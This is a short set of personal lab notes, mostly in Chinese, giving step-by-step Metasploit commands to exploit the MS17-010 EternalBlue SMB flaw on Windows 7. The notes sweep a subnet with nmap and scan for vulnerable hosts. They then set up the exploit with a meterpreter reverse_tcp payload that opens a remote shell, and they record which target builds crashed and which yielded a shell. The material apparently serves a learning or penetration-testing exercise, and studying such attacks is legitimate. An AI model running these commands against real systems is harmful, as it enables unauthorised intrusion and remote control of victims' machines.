nmap 192.168.55.1-254   扫描网段 win7开防火墙 ping 不通   win8 开防火墙 能 ping 通



msfconsole
use  auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.1/24    扫描网段
run


利用  
use exploit/windows/smb/ms17_010_eternalblue
 set RHOST 192.168.1.227
 set LHOST 192.168.5.118    本机
//set payload windows/x64/meterpreter/reverse_tcp     //配置回链方式   跳过这句成功后  再运行它再次exploit 这句就执行了  如果目标是64位千万别这么写 payload windows/meterpreter/reverse_tcp   弹框错误
run 或者 exploit

win7 32位失败  老是 蓝屏   
cn_windows_7_ultimate_x86_dvd_x15-65907.iso    改天试试 修改上面的  payload试试改成x86的不用64位的
换64位试试 
cn_windows_7_ultimate_x64_dvd_x15-66043.iso    2009-08-23  成功得到shell 没 蓝屏


https://blog.51cto.com/1inux/2091505
https://blog.csdn.net/xiaopan233/article/details/82808386
https://www.cnblogs.com/wangyuyang1016/p/12099333.html
